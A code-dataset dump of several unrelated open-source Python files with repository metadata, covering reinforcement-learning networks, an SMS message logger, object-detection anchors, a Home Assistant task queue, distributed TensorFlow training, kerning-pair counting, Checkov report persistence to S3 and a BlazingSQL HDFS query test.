# one less than `self.num_layers`, as `self._final_layer` counts as one).
for _ in range(self.num_layers - 1):
x = nn.Dense(features=self.hidden_units,
kernel_init=kernel_initializer)(x)
x = nn.relu(x)
# The final layer will output a value for each action.
q_values = nn.Dense(features=self.num_actions,
kernel_init=kernel_initializer)(x)
if self.is_dopamine:
q_values = atari_lib.DQNNetworkType(q_values)
return q_values
@gin.configurable
class QuantileNetwork(nn.Module):
"""Network used to compute the agent's return quantiles."""
num_actions: int
num_layers: int = gin.REQUIRED
hidden_units: int = gin.REQUIRED
num_atoms: int = 51 # Normally set by JaxQuantileAgent.
inputs_preprocessed: bool = False
@nn.compact
def __call__(self, x: jnp.ndarray):
# This method sets up the MLP for inference, using the specified number of
# layers and units.
logging.info('Creating MLP network with %d layers, %d hidden units, and '
'%d atoms', self.num_layers, self.hidden_units, self.num_atoms)
# Network initializer.
kernel_initializer = nn.initializers.variance_scaling(
scale=1.0 / jnp.sqrt(3.0),
mode='fan_in',
distribution='uniform')
x = x.astype(jnp.float32) # Convert to JAX float32 type.
x = x.reshape(-1) # Flatten.
# Pass through the desired number of hidden layers (we do this for
# one less than `self.num_layers`, as `self._final_layer` counts as one).
for _ in range(self.num_layers - 1):
x = nn.Dense(features=self.hidden_units,
kernel_init=kernel_initializer)(x)
x = nn.relu(x)
x = nn.Dense(features=self.num_actions * self.num_atoms,
kernel_init=kernel_initializer)(x)
logits = x.reshape((self.num_actions, self.num_atoms))
probabilities = nn.softmax(logits)
q_values = jnp.mean(logits, axis=1)
return atari_lib.RainbowNetworkType(q_values, logits, probabilities)
|
ab060bc6c79e5cdbb1438f1eea14075eec0ef9d3
|
7ae9aa9e9d359e2182bbab6ae7e083fc2c7fa815
|
/rapidsms/contrib/messagelog/app.py
|
b20e79319daf877d65505d4de8f23649557623d7
|
[
"BSD-3-Clause"
] |
permissive
|
rapidsms/rapidsms
|
8ce6d3f46002146e76cf68fdca3288865578b17a
|
aaa2ddab68e19d979525c3823c3ec0e646e92c83
|
refs/heads/develop
| 2023-08-15T16:44:27.206841
| 2022-03-16T15:09:36
| 2022-03-16T15:09:36
| 132,857
| 409
| 196
|
BSD-3-Clause
| 2023-09-11T20:41:56
| 2009-02-19T22:21:40
|
Python
|
UTF-8
|
Python
| false
| false
| 861
|
py
|
app.py
|
#!/usr/bin/env python
# vim: ai ts=4 sts=4 et sw=4
from django.utils import timezone
from rapidsms.apps.base import AppBase
from .models import Message
class MessageLogApp(AppBase):
def _log(self, direction, msg):
if not msg.connections:
raise ValueError
text = msg.raw_text if direction == Message.INCOMING else msg.text
return Message.objects.create(
date=timezone.now(),
direction=direction,
text=text,
contact=msg.connections[0].contact,
connection=msg.connections[0],
)
def parse(self, msg):
# annotate the message as we log them in case any other apps
# want a handle to them
msg.logger_msg = self._log(Message.INCOMING, msg)
def outgoing(self, msg):
msg.logger_msg = self._log(Message.OUTGOING, msg)
|
838a86beda590c0b23da872c1961d4f7b88e919e
|
39cbaf37db9eb60abca67cfc513eca81397f1a14
|
/contrib/0.挖宝行动/awebone-护肤品识别/llib/layer_utils/snippets.py
|
a4335936245e515b102aef8575014b08670990d6
|
[
"Apache-2.0"
] |
permissive
|
huaweicloud/ModelArts-Lab
|
6d8255a0ac608d79a44cef515f0cbd98b855b15f
|
ce1a275fa5fe08c0873a9318d8e66e3eef08d4ba
|
refs/heads/master
| 2023-08-23T03:18:55.729714
| 2023-04-28T06:55:07
| 2023-04-28T06:55:07
| 185,701,977
| 1,117
| 1,102
|
Apache-2.0
| 2023-07-20T15:05:59
| 2019-05-09T01:08:50
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
| 1,348
|
py
|
snippets.py
|
# --------------------------------------------------------
# Tensorflow Faster R-CNN
# Licensed under The MIT License [see LICENSE for details]
# Written by Xinlei Chen
# --------------------------------------------------------
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from lib.layer_utils.generate_anchors import generate_anchors
def generate_anchors_pre(height, width, feat_stride, anchor_scales=(8, 16, 32), anchor_ratios=(0.5, 1, 2)):
""" A wrapper function to generate anchors given different scales
Also return the number of anchors in variable 'length'
"""
anchors = generate_anchors(ratios=np.array(anchor_ratios), scales=np.array(anchor_scales))
A = anchors.shape[0]
shift_x = np.arange(0, width) * feat_stride
shift_y = np.arange(0, height) * feat_stride
shift_x, shift_y = np.meshgrid(shift_x, shift_y)
shifts = np.vstack((shift_x.ravel(), shift_y.ravel(), shift_x.ravel(), shift_y.ravel())).transpose()
K = shifts.shape[0]
# width changes faster, so here it is H, W, C
anchors = anchors.reshape((1, A, 4)) + shifts.reshape((1, K, 4)).transpose((1, 0, 2))
anchors = anchors.reshape((K * A, 4)).astype(np.float32, copy=False)
length = np.int32(anchors.shape[0])
return anchors, length
|
17b728cc5ea7edf19bc22f4daa8a7cbb83f9d77d
|
fd3047a84c7a144463d106c663537d055482f12e
|
/custom_components/hacs/utils/queue_manager.py
|
8bc77145d22ceb07b28003c6337c32642c993c0c
|
[
"MIT"
] |
permissive
|
hacs/integration
|
827370c861aff9de08e536e71866313228eeb66e
|
6a27b0a4b74ed4161185af438bcff5aec926f4d9
|
refs/heads/main
| 2023-09-04T04:33:35.834376
| 2023-08-27T08:53:58
| 2023-08-27T08:53:58
| 172,733,314
| 3,601
| 902
|
MIT
| 2023-09-11T07:00:42
| 2019-02-26T15:01:10
|
Python
|
UTF-8
|
Python
| false
| false
| 2,459
|
py
|
queue_manager.py
|
"""The QueueManager class."""
from __future__ import annotations
import asyncio
import time
from typing import Coroutine
from homeassistant.core import HomeAssistant
from ..exceptions import HacsExecutionStillInProgress
from .logger import LOGGER
_LOGGER = LOGGER
class QueueManager:
"""The QueueManager class."""
def __init__(self, hass: HomeAssistant) -> None:
self.hass = hass
self.queue: list[Coroutine] = []
self.running = False
@property
def pending_tasks(self) -> int:
"""Return a count of pending tasks in the queue."""
return len(self.queue)
@property
def has_pending_tasks(self) -> bool:
"""Return a count of pending tasks in the queue."""
return self.pending_tasks != 0
def clear(self) -> None:
"""Clear the queue."""
self.queue = []
def add(self, task: Coroutine) -> None:
"""Add a task to the queue."""
self.queue.append(task)
async def execute(self, number_of_tasks: int | None = None) -> None:
"""Execute the tasks in the queue."""
if self.running:
_LOGGER.debug("<QueueManager> Execution is already running")
raise HacsExecutionStillInProgress
if len(self.queue) == 0:
_LOGGER.debug("<QueueManager> The queue is empty")
return
self.running = True
_LOGGER.debug("<QueueManager> Checking out tasks to execute")
local_queue = []
if number_of_tasks:
for task in self.queue[:number_of_tasks]:
local_queue.append(task)
else:
for task in self.queue:
local_queue.append(task)
for task in local_queue:
self.queue.remove(task)
_LOGGER.debug("<QueueManager> Starting queue execution for %s tasks", len(local_queue))
start = time.time()
result = await asyncio.gather(*local_queue, return_exceptions=True)
for entry in result:
if isinstance(entry, Exception):
_LOGGER.error("<QueueManager> %s", entry)
end = time.time() - start
_LOGGER.debug(
"<QueueManager> Queue execution finished for %s tasks finished in %.2f seconds",
len(local_queue),
end,
)
if self.has_pending_tasks:
_LOGGER.debug("<QueueManager> %s tasks remaining in the queue", len(self.queue))
self.running = False
|
83f147e0cea3498bd44f34f774a47d2879febaeb
|
f27e3fdc97290b1db6d3fa7039ad59e4f8b5a760
|
/tensorflow-1/comet-tf1-distributed-mirrored-strategy.py
|
2416d030b75a9ece44fea05c33f54dd5201013f8
|
[] |
no_license
|
comet-ml/comet-examples
|
9c7bcea8b97986fb7987cbe0f4533f619e2a0939
|
9da5d4f296e633bb7e63b47dc2d3f7a0780c0a4e
|
refs/heads/master
| 2023-08-19T03:32:51.864273
| 2023-08-09T09:30:34
| 2023-08-09T09:30:34
| 158,587,515
| 134
| 55
| null | 2023-09-13T16:58:41
| 2018-11-21T18:00:34
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
| 4,479
|
py
|
comet-tf1-distributed-mirrored-strategy.py
|
# Copyright 2019 The TensorFlow Authors. All Rights Reserved.
# Copyright (C) 2021 Comet ML INC
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
import comet_ml
# Import TensorFlow
import tensorflow as tf
# Helper libraries
import numpy as np
import os
PROJECT_NAME = "tf1-mirrored"
experiment = comet_ml.Experiment(project_name=PROJECT_NAME)
print(tf.__version__)
fashion_mnist = tf.keras.datasets.fashion_mnist
(train_images, train_labels), (test_images, test_labels) = fashion_mnist.load_data()
# Adding a dimension to the array -> new shape == (28, 28, 1)
# We are doing this because the first layer in our model is a convolutional
# layer and it requires a 4D input (batch_size, height, width, channels).
# batch_size dimension will be added later on.
train_images = train_images[..., None]
test_images = test_images[..., None]
# Getting the images in [0, 1] range.
train_images = train_images / np.float32(255)
test_images = test_images / np.float32(255)
train_labels = train_labels.astype("int64")
test_labels = test_labels.astype("int64")
# If the list of devices is not specified in the
# `tf.distribute.MirroredStrategy` constructor, it will be auto-detected.
strategy = tf.distribute.MirroredStrategy()
print("Number of devices: {}".format(strategy.num_replicas_in_sync))
BUFFER_SIZE = len(train_images)
BATCH_SIZE_PER_REPLICA = 64
BATCH_SIZE = BATCH_SIZE_PER_REPLICA * strategy.num_replicas_in_sync
EPOCHS = 10
STEPS_PER_EPOCH = 100
with strategy.scope():
train_dataset = (
tf.data.Dataset.from_tensor_slices((train_images, train_labels))
.shuffle(BUFFER_SIZE)
.batch(BATCH_SIZE)
)
train_ds = strategy.experimental_distribute_dataset(train_dataset)
test_dataset = tf.data.Dataset.from_tensor_slices((test_images, test_labels)).batch(
BATCH_SIZE
)
test_ds = strategy.experimental_distribute_dataset(test_dataset)
model = tf.keras.Sequential(
[
tf.keras.layers.Conv2D(32, 3, activation="relu", input_shape=(28, 28, 1)),
tf.keras.layers.MaxPooling2D(),
tf.keras.layers.Conv2D(64, 3, activation="relu"),
tf.keras.layers.MaxPooling2D(),
tf.keras.layers.Flatten(),
tf.keras.layers.Dense(64, activation="relu"),
tf.keras.layers.Dense(10, activation="softmax"),
]
)
optimizer = tf.train.GradientDescentOptimizer(0.001)
def train_step(dist_inputs):
def step_fn(inputs):
images, labels = inputs
logits = model(images)
cross_entropy = tf.nn.sparse_softmax_cross_entropy_with_logits(
logits=logits, labels=labels
)
loss = loss = tf.reduce_sum(cross_entropy) * (1.0 / BATCH_SIZE)
train_op = optimizer.minimize(loss)
with tf.control_dependencies([train_op]):
return tf.identity(loss)
per_replica_losses = strategy.experimental_run_v2(step_fn, args=(dist_inputs,))
mean_loss = strategy.reduce(
tf.distribute.ReduceOp.SUM, per_replica_losses, axis=None
)
return mean_loss
train_iterator = train_ds.make_initializable_iterator()
iterator_init = train_iterator.initializer
var_init = tf.global_variables_initializer()
loss = train_step(next(train_iterator))
with tf.train.MonitoredTrainingSession() as sess:
sess.run([var_init])
for epoch in range(EPOCHS):
sess.run([iterator_init])
for step in range(STEPS_PER_EPOCH):
current_loss = sess.run(loss)
if step % 10 == 0:
print(
"Epoch {} Step {} Loss {:.4f}".format(epoch, step, current_loss)
)
experiment.log_metric(
"loss", current_loss, step=(STEPS_PER_EPOCH * epoch) + step
)
|
3b15358fa977202265527280acf2d90bad96b249
|
e67944ffe8f8757d64b0fb92172718c139e2c41b
|
/3G_total_count.py
|
65bcc8b8e899ac6a40e6732700be7f3b6b75a5dc
|
[
"MIT"
] |
permissive
|
andre-fuchs/kerning-pairs
|
64f4cef64f3a2a6ce3bf56f88db8bfac380e1264
|
bfd95de7fb1ccd00d5bba9913deead83fddfb3f5
|
refs/heads/master
| 2023-08-16T16:57:39.179108
| 2023-08-14T12:03:56
| 2023-08-14T12:03:56
| 222,538,080
| 127
| 5
|
MIT
| 2023-08-14T12:03:58
| 2019-11-18T20:26:46
|
Python
|
UTF-8
|
Python
| false
| false
| 3,315
|
py
|
3G_total_count.py
|
"""
This script merge all language specific letter pairs to a global total.
Using the highscores instead of the total sum or an average no relevant
pair of any language gets lost or ranked down.
"""
import json
import operator
from collections import defaultdict
from pprint import pprint
LANGUAGES = [
"cs",
"de",
"en",
"es",
"et",
"fi",
"fr",
"hu",
"it",
"nl",
"no",
"pl",
"pt",
"se",
"sv",
"da",
"hr",
"sl",
"lt",
"tr",
"lv",
"ro",
"sk",
"sq",
]
QUOTES = ['"', "'", "«", "»", "‘", "’", "‚", "‛", "“", "”", "„", "‟", "‹", "›"]
# HIGHSCORES
globalLetterPairs = {}
for LANGUAGE in LANGUAGES:
# Dictionaries to store all pairs containing quotes
# To generate all possible stylistic alternates
leftQuotes = defaultdict(lambda: 1)
rightQuotes = defaultdict(lambda: 1)
with open("count/by_language/" + LANGUAGE + "/list.json", "r") as inputList, open(
"count/by_language/" + LANGUAGE + "/dictionary.json", "r"
) as inputDict:
letterPairs = dict(json.load(inputList))
totalValue = letterPairs["total"]
print(LANGUAGE, "Raw number of pairs:", len(letterPairs))
# Sum up all quotes
parentDict = json.load(inputDict)
for leftLetter, childrenDict in parentDict.items():
for rightLetter, count in childrenDict.items():
if leftLetter in QUOTES:
leftQuotes[rightLetter] += count
if rightLetter in QUOTES:
rightQuotes[leftLetter] += count
# Remove all keys containing quotes
letterPairs = {
k: v
for k, v in letterPairs.items()
if not any(QUOTE in k for QUOTE in QUOTES)
}
print(LANGUAGE, "Without quotes", len(letterPairs))
# Overwrite/add pairs containing representative quote characters
for rightLetter, count in leftQuotes.items():
for QUOTE in ['"', "„", "«", "»"]:
letterPairs[QUOTE + rightLetter] = count
for leftLetter, count in rightQuotes.items():
for QUOTE in ['"', "«", "»"]:
letterPairs[leftLetter + QUOTE] = count
print(LANGUAGE, "With all placeholder quotes", len(letterPairs))
# Clamp below minimum count of 1 per book (100 pages à 3000 characters)
letterPairs = {k: v / totalValue * 3000 * 100 for k, v in letterPairs.items()}
# Stores the highest existing value of the given languages
globalLetterPairs = {
key: letterPairs.get(key, 0)
if letterPairs.get(key, 0) > globalLetterPairs.get(key, 0)
else globalLetterPairs.get(key, 0)
for key in set(letterPairs) | set(globalLetterPairs)
}
# SORTING
globalLetterPairs = sorted(
globalLetterPairs.items(), key=operator.itemgetter(1), reverse=True
)
globalLetterPairsDict = {key: value for (key, value) in globalLetterPairs}
# OUTPUT
with open("count/total/list.json", "w") as output_a, open(
"count/total/dictionary.json", "w"
) as output_b:
output_a.write(json.dumps(globalLetterPairs, indent=4, ensure_ascii=False))
output_b.write(json.dumps(globalLetterPairsDict, indent=4, ensure_ascii=False))
|
f6b4f36edc53b26864a982dbb13e74e7bfd40bb2
|
45e376ae66b78b17788b1d3575b334b2cb1d0b1c
|
/checkov/common/bridgecrew/wrapper.py
|
17dde199b96a5dd2ecba404160b7dcd7216ad2af
|
[
"Apache-2.0"
] |
permissive
|
bridgecrewio/checkov
|
aeb8febed2ed90e61d5755f8f9d80b125362644d
|
e64cbd27ffb6f09c2c9f081b45b7a821a3aa1a4d
|
refs/heads/main
| 2023-08-31T06:57:21.990147
| 2023-08-30T23:01:47
| 2023-08-30T23:01:47
| 224,386,599
| 5,929
| 1,056
|
Apache-2.0
| 2023-09-14T20:10:23
| 2019-11-27T08:55:14
|
Python
|
UTF-8
|
Python
| false
| false
| 7,646
|
py
|
wrapper.py
|
from __future__ import annotations
import logging
import os
import json
import itertools
from concurrent import futures
from io import StringIO
from typing import Any, TYPE_CHECKING
from collections import defaultdict
import dpath
from igraph import Graph
try:
from networkx import DiGraph, node_link_data
except ImportError:
logging.info("Not able to import networkx")
DiGraph = str
node_link_data = lambda G : {}
from checkov.common.bridgecrew.check_type import CheckType
from checkov.common.models.consts import SUPPORTED_FILE_EXTENSIONS
from checkov.common.typing import _ReducedScanReport
from checkov.common.util.file_utils import compress_string_io_tar
from checkov.common.util.igraph_serialization import serialize_to_json
from checkov.common.util.json_utils import CustomJSONEncoder
if TYPE_CHECKING:
from mypy_boto3_s3.client import S3Client
from checkov.common.output.report import Report
checkov_results_prefix = 'checkov_results'
check_reduced_keys = (
'check_id', 'check_result', 'resource', 'file_path',
'file_line_range', 'code_block', 'caller_file_path', 'caller_file_line_range')
secrets_check_reduced_keys = check_reduced_keys + ('validation_status',)
check_metadata_keys = ('evaluations', 'code_block', 'workflow_name', 'triggers', 'job')
def _is_scanned_file(file: str) -> bool:
file_ending = os.path.splitext(file)[1]
return file_ending in SUPPORTED_FILE_EXTENSIONS
def _put_json_object(s3_client: S3Client, json_obj: Any, bucket: str, object_path: str, log_stack_trace_on_error: bool = True) -> None:
try:
s3_client.put_object(Bucket=bucket, Key=object_path, Body=json.dumps(json_obj, cls=CustomJSONEncoder))
except Exception:
logging.error(f"failed to persist object into S3 bucket {bucket}", exc_info=log_stack_trace_on_error)
raise
def _extract_checks_metadata(report: Report, full_repo_object_key: str) -> dict[str, dict[str, Any]]:
metadata: dict[str, dict[str, Any]] = defaultdict(dict)
for check in itertools.chain(report.passed_checks, report.failed_checks, report.skipped_checks):
metadata_key = f'{check.file_path}:{check.resource}'
check_meta = {k: getattr(check, k, "") for k in check_metadata_keys}
check_meta['file_object_path'] = full_repo_object_key + check.file_path
metadata[metadata_key][check.check_id] = check_meta
return metadata
def reduce_scan_reports(scan_reports: list[Report]) -> dict[str, _ReducedScanReport]:
"""
Transform checkov reports objects into compact dictionaries
:param scan_reports: List of checkov output reports
:return: dictionary of
"""
reduced_scan_reports: dict[str, _ReducedScanReport] = {}
for report in scan_reports:
check_type = report.check_type
reduced_keys = secrets_check_reduced_keys if check_type == CheckType.SECRETS else check_reduced_keys
reduced_scan_reports[check_type] = \
{
"checks": {
"passed_checks": [
{k: getattr(check, k) for k in reduced_keys}
for check in report.passed_checks],
"failed_checks": [
{k: getattr(check, k) for k in reduced_keys}
for check in report.failed_checks],
"skipped_checks": [
{k: getattr(check, k) for k in reduced_keys}
for check in report.skipped_checks]
},
"image_cached_results": report.image_cached_results
}
return reduced_scan_reports
def persist_checks_results(
reduced_scan_reports: dict[str, _ReducedScanReport], s3_client: S3Client, bucket: str,
full_repo_object_key: str
) -> dict[str, str]:
"""
Save reduced scan reports into bridgecrew's platform
:return: List of checks results path of all runners
"""
checks_results_paths = {}
for check_type, reduced_report in reduced_scan_reports.items():
check_result_object_path = f'{full_repo_object_key}/{checkov_results_prefix}/{check_type}/checks_results.json'
checks_results_paths[check_type] = check_result_object_path
_put_json_object(s3_client, reduced_report, bucket, check_result_object_path)
return checks_results_paths
def persist_run_metadata(
run_metadata: dict[str, str | list[str]], s3_client: S3Client, bucket: str, full_repo_object_key: str, use_checkov_results: bool = True
) -> None:
object_path = f'{full_repo_object_key}/{checkov_results_prefix}/run_metadata.json' if use_checkov_results else f'{full_repo_object_key}/run_metadata.json'
try:
s3_client.put_object(Bucket=bucket, Key=object_path, Body=json.dumps(run_metadata, indent=2))
except Exception:
logging.error(f"failed to persist run metadata into S3 bucket {bucket}", exc_info=True)
raise
def persist_logs_stream(logs_stream: StringIO, s3_client: S3Client, bucket: str, full_repo_object_key: str) -> None:
file_io = compress_string_io_tar(logs_stream)
object_path = f'{full_repo_object_key}/logs_file.tar.gz'
try:
s3_client.put_object(Bucket=bucket, Key=object_path, Body=file_io)
except Exception:
logging.error(f"failed to persist logs stream into S3 bucket {bucket}", exc_info=True)
raise
def enrich_and_persist_checks_metadata(
scan_reports: list[Report], s3_client: S3Client, bucket: str, full_repo_object_key: str
) -> dict[str, dict[str, str]]:
"""
Save checks metadata into bridgecrew's platform
:return:
"""
checks_metadata_paths: dict[str, dict[str, str]] = {}
for scan_report in scan_reports:
check_type = scan_report.check_type
checks_metadata_object = _extract_checks_metadata(scan_report, full_repo_object_key)
checks_metadata_object_path = f'{full_repo_object_key}/{checkov_results_prefix}/{check_type}/checks_metadata.json'
dpath.new(checks_metadata_paths, f"{check_type}/checks_metadata_path", checks_metadata_object_path)
_put_json_object(s3_client, checks_metadata_object, bucket, checks_metadata_object_path)
return checks_metadata_paths
def persist_graphs(graphs: dict[str, DiGraph | Graph], s3_client: S3Client, bucket: str, full_repo_object_key: str,
timeout: int, absolute_root_folder: str = '') -> None:
def _upload_graph(check_type: str, graph: DiGraph | Graph, _absolute_root_folder: str = '') -> None:
if isinstance(graph, DiGraph):
json_obj = node_link_data(graph)
graph_file_name = 'graph_networkx.json'
elif isinstance(graph, Graph):
json_obj = serialize_to_json(graph, _absolute_root_folder)
graph_file_name = 'graph_igraph.json'
else:
logging.error(f"unsupported graph type '{graph.__class__.__name__}'")
return
s3_key = f'{graphs_repo_object_key}/{check_type}/{graph_file_name}'
try:
_put_json_object(s3_client, json_obj, bucket, s3_key)
except Exception:
logging.error(f'failed to upload graph from framework {check_type} to platform', exc_info=True)
graphs_repo_object_key = full_repo_object_key.replace('checkov', 'graphs')[:-4]
with futures.ThreadPoolExecutor() as executor:
futures.wait(
[executor.submit(_upload_graph, check_type, graph, absolute_root_folder) for
check_type, graph in graphs.items()],
return_when=futures.FIRST_EXCEPTION,
timeout=timeout
)
logging.info(f"Done persisting {len(graphs)} graphs")
|
f08c634d51bed7db8847810c60f908747a66c570
|
3febe9bd6d3f0240754239bca7c02720a53dbe22
|
/tests/BlazingSQLTest/EndToEndTests/oldScripts/fileSystemHdfsTest.py
|
3d7f75855f45ecc3c5fbd98bac07d813eba112f1
|
[
"Apache-2.0"
] |
permissive
|
BlazingDB/blazingsql
|
9c7b1bdad1538a4478332de57375830090069e85
|
a35643d4c983334757eee96d5b9005b8b9fbd21b
|
refs/heads/branch-21.08
| 2023-08-17T16:10:36.051621
| 2021-09-30T21:51:09
| 2021-09-30T21:51:09
| 150,149,024
| 854
| 114
|
Apache-2.0
| 2022-09-16T23:58:36
| 2018-09-24T18:25:45
|
C++
|
UTF-8
|
Python
| false
| false
| 12,469
|
py
|
fileSystemHdfsTest.py
|
import os
from blazingsql import DataType
from Configuration import Settings as Settings
from DataBase import createSchema as cs
from pynvml import nvmlInit
from Runner import runTest
from Utils import Execution, gpuMemory, init_context, skip_test, startHadoop
queryType = "Hdfs FileSystem"
def main(dask_client, drill, dir_data_lc, bc, nRals):
start_mem = gpuMemory.capture_gpu_memory_usage()
def executionTest():
# Read Data TPCH------------------------------------------------------
authority = "hdfsdisk"
ktoken = "../KrbHDFS/myconf/krb5cc_0"
krbticket = os.path.abspath(ktoken)
hdfs_host = "172.22.0.3"
hdfs_port = 9000
hdfs_driver = "libhdfs"
print("Using krb ticket: " + krbticket)
result, error_msg, fs = bc.hdfs(
authority,
host=hdfs_host,
port=hdfs_port,
user="jhs",
driver=hdfs_driver,
kerb_ticket=krbticket,
)
if result is False:
msg = (
"""WARNING: Could not connect to HDFS instance %s:%d using
driver %s, error was: %s"""
% (hdfs_host, hdfs_port, hdfs_driver, error_msg)
)
print(msg)
print("WARNING: Will ignore " + queryType)
return
print("Success connection to HDFS:")
print(fs)
hdfs_dir_data_lc = "hdfs://" + authority + dir_data_lc
print("TPCH files at: " + hdfs_dir_data_lc)
tables = ["nation", "region", "supplier", "customer",
"lineitem", "orders"]
# TODO parquet json
data_types = [DataType.CSV, DataType.ORC, DataType.PARQUET]
for fileSchemaType in data_types:
if skip_test(dask_client, nRals, fileSchemaType, queryType):
continue
cs.create_tables(bc, hdfs_dir_data_lc, fileSchemaType,
tables=tables)
# Run Query -----------------------------------------------------
# Parameter to indicate if its necessary to order
# the resulsets before compare them
worder = 1
use_percentage = False
acceptable_difference = 0.01
print("==============================")
print(queryType)
print("==============================")
queryId = "TEST_01"
query = """select count(c_custkey) as c1, count(c_acctbal) as c2
from customer"""
runTest.run_query(
bc,
drill,
query,
queryId,
queryType,
worder,
"",
acceptable_difference,
use_percentage,
fileSchemaType,
)
queryId = "TEST_02"
query = """select count(n_nationkey), count(n_regionkey)
from nation"""
runTest.run_query(
bc,
drill,
query,
queryId,
queryType,
worder,
"",
acceptable_difference,
use_percentage,
fileSchemaType,
)
queryId = "TEST_03"
query = """select count(s_suppkey), count(s_nationkey)
from supplier"""
runTest.run_query(
bc,
drill,
query,
queryId,
queryType,
worder,
"",
acceptable_difference,
use_percentage,
fileSchemaType,
)
queryId = "TEST_04"
query = """select count(c_custkey), sum(c_acctbal),
sum(c_acctbal)/count(c_acctbal),
min(c_custkey), max(c_nationkey),
(max(c_nationkey) + min(c_nationkey))/2 c_nationkey
from customer where c_custkey < 100
group by c_nationkey"""
runTest.run_query(
bc,
drill,
query,
queryId,
queryType,
worder,
"",
0.01,
True,
fileSchemaType,
) # TODO: Change sum/count for avg KC
queryId = "TEST_05"
query = """select c.c_custkey, c.c_nationkey, n.n_regionkey
from customer as c inner join nation as n
on c.c_nationkey = n.n_nationkey
where n.n_regionkey = 1 and c.c_custkey < 50"""
runTest.run_query(
bc,
drill,
query,
queryId,
queryType,
worder,
"",
acceptable_difference,
use_percentage,
fileSchemaType,
)
queryId = "TEST_06"
query = """select c_custkey, c_nationkey, c_acctbal
from customer order by c_nationkey, c_custkey, c_acctbal"""
runTest.run_query(
bc,
drill,
query,
queryId,
queryType,
0,
"",
acceptable_difference,
use_percentage,
fileSchemaType,
)
queryId = "TEST_07"
query = """select c_custkey + c_nationkey, c_acctbal
from customer order by 1, 2"""
runTest.run_query(
bc,
drill,
query,
queryId,
queryType,
0,
"",
acceptable_difference,
use_percentage,
fileSchemaType,
)
queryId = "TEST_08"
query = """select n1.n_nationkey as supp_nation,
n2.n_nationkey as cust_nation,
l.l_extendedprice * l.l_discount
from supplier as s
inner join lineitem as l on s.s_suppkey = l.l_suppkey
inner join orders as o on o.o_orderkey = l.l_orderkey
inner join customer as c on c.c_custkey = o.o_custkey
inner join nation as n1 on s.s_nationkey = n1.n_nationkey
inner join nation as n2 on c.c_nationkey = n2.n_nationkey
where n1.n_nationkey = 1
and n2.n_nationkey = 2 and o.o_orderkey < 10000"""
runTest.run_query(
bc,
drill,
query,
queryId,
queryType,
worder,
"",
acceptable_difference,
use_percentage,
fileSchemaType,
)
queryId = "TEST_09"
query = """select c_custkey, c_nationkey as nkey
from customer where c_custkey < 0 and c_nationkey >= 30"""
runTest.run_query(
bc,
drill,
query,
queryId,
queryType,
worder,
"",
acceptable_difference,
use_percentage,
fileSchemaType,
)
queryId = "TEST_10"
query = """select sin(c_acctbal), cos(c_acctbal),
asin(c_acctbal), acos(c_acctbal),
ln(c_acctbal), tan(c_acctbal),
atan(c_acctbal), floor(c_acctbal), c_acctbal
from customer"""
runTest.run_query(
bc,
drill,
query,
queryId,
queryType,
worder,
"",
0.01,
use_percentage,
fileSchemaType,
)
queryId = "TEST_11"
query = """select n1.n_nationkey as n1key,
n2.n_nationkey as n2key,
n1.n_nationkey + n2.n_nationkey
from nation as n1
full outer join nation as n2
on n1.n_nationkey = n2.n_nationkey + 6
where n1.n_nationkey < 10
and n1.n_nationkey > 5"""
runTest.run_query(
bc,
drill,
query,
queryId,
queryType,
worder,
"",
acceptable_difference,
use_percentage,
fileSchemaType,
)
queryId = "TEST_12"
query = """select count(n1.n_nationkey) as n1key,
count(n2.n_nationkey) as n2key, count(*) as cstar
from nation as n1
full outer join nation as n2
on n1.n_nationkey = n2.n_nationkey + 6"""
runTest.run_query(
bc,
drill,
query,
queryId,
queryType,
worder,
"",
acceptable_difference,
use_percentage,
fileSchemaType,
)
queryId = "TEST_13"
query = """select o_orderkey, o_custkey
from orders where o_orderkey < 10 and o_orderkey >= 1"""
runTest.run_query(
bc,
drill,
query,
queryId,
queryType,
worder,
"",
acceptable_difference,
use_percentage,
fileSchemaType,
)
queryId = "TEST_14"
query = """select 100168549 - sum(o_orderkey)/count(o_orderkey),
56410984/sum(o_totalprice),
(123 - 945/max(o_orderkey)) /
(sum(81619/o_orderkey)/count(81619/o_orderkey))
from orders where o_orderkey < 50"""
runTest.run_query(
bc,
drill,
query,
queryId,
queryType,
worder,
"",
0.01,
True,
fileSchemaType,
) # TODO: Change sum/count for avg KC
queryId = "TEST_15"
query = """select EXTRACT(YEAR FROM l_receiptdate) -
EXTRACT(YEAR FROM l_shipdate) as years_late,
EXTRACT(MONTH FROM l_receiptdate) -
EXTRACT(MONTH FROM l_shipdate) as months_late,
EXTRACT(DAY FROM l_receiptdate) -
EXTRACT(DAY FROM l_shipdate) as days_late
from lineitem
where l_shipdate < DATE '1993-01-01'"""
runTest.run_query(
bc,
drill,
query,
queryId,
queryType,
worder,
"",
acceptable_difference,
use_percentage,
fileSchemaType,
)
executionTest()
end_mem = gpuMemory.capture_gpu_memory_usage()
gpuMemory.log_memory_usage(queryType, start_mem, end_mem)
if __name__ == "__main__":
Execution.getArgs()
nvmlInit()
compare_results = True
if "compare_results" in Settings.data["RunSettings"]:
compare_results = Settings.data["RunSettings"]["compare_results"]
drill = None
if compare_results:
# Create Table Drill ------------------------------------------------
from pydrill.client import PyDrill
drill = PyDrill(host="localhost", port=8047)
cs.init_drill_schema(drill,
Settings.data["TestSettings"]["dataDirectory"])
startHadoop.start_hdfs()
# Create Context For BlazingSQL
bc, dask_client = init_context()
nRals = Settings.data["RunSettings"]["nRals"]
main(dask_client, drill, Settings.data["TestSettings"]["dataDirectory"],
bc, nRals)
startHadoop.stop_hdfs()
runTest.save_log()
gpuMemory.print_log_gpu_memory()
|
0f5e939ff6715bcbee3b4ef4dd34438bb8f7492e
|
4d3a077a439df835ce475efe7824ef6d3046b81c
|
/script/vul/kindeditor/upload_json.py
|
30a178c2aec06064d74f96d46588b1e30b906062
|
[] |
no_license
|
orleven/Tentacle
|
f00bc62278e462a3be4bfc4378f34c95d5419617
|
0b364caa7272030e03b876caf71bc9026e3ba57a
|
refs/heads/master
| 2023-09-01T11:07:33.020640
